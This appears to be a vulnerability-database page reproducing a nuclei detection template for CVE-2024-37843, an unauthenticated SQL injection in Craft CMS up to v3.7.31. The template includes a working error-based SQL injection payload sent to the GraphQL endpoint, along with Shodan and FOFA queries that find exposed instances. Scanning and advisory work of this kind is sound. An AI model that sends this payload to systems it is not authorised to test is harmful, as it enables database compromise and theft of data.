Lucene search
K

Craft CMS <=v3.7.31 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Craft CMS v3.7.31 SQL Injection via GraphQL AP

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-37843
18 Jun 202402:30
circl
CNNVD
CraftCMS Security Vulnerability
25 Jun 202400:00
cnnvd
CVE
CVE-2024-37843
25 Jun 202400:00
cve
Cvelist
CVE-2024-37843
25 Jun 202400:00
cvelist
GithubExploit
Exploit for SQL Injection in Craftcms Craft_Cms
18 Jun 202402:27
githubexploit
Github Security Blog
Craft CMS SQL injection vulnerability via the GraphQL API endpoint
25 Jun 202421:31
github
NVD
CVE-2024-37843
25 Jun 202421:15
nvd
OSV
GHSA-HQ4F-MV3Q-8WCV Craft CMS SQL injection vulnerability via the GraphQL API endpoint
25 Jun 202421:31
osv
Positive Technologies
PT-2024-27777 · Craft Cms · Craft Cms
25 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-37843
23 May 202509:22
redhatcve
Rows per page
id: CVE-2024-37843

info:
  name: Craft CMS <=v3.7.31 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries via the GraphQL API endpoint, potentially compromising the database.
  remediation: |
    Update Craft CMS to a version later than v3.7.31.
  reference:
    - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql
    - https://github.com/gsmith257-cyber/CVE-2024-37843-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-37843
    cwe-id: CWE-89
    epss-score: 0.51282
    epss-percentile: 0.98804
    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: craftcms
    product: craft_cms
    shodan-query:
      - cpe:"cpe:2.3:a:craftcms:craft_cms"
      - http.html:"craftcms"
      - http.favicon.hash:"-47932290"
      - "X-Powered-By: Craft CMS"
    fofa-query:
      - body=craftcms
      - icon_hash=-47932290
    publicwww-query: craftcms
  tags: cve,cve2024,craftcms,sqli,vuln

variables:
  matcher: "{{rand_base(4)}}"

http:
  - raw:
      - |
        POST /api/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type:application/json

        {"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "General error: 1105 XPATH syntax error: '\\n{{matcher}}"

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4b0a00483046022100d4eabe1e24b254cc9eecd2ba7f2618e7653b4b74734a1d8c427d49cb21f836750221008bd8ef4e0f205153347176548c51d5fa91ad3ab2bb9c5dff3faaf11c82e0f135:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5 - 9.8
EPSS0.51282
SSVC
44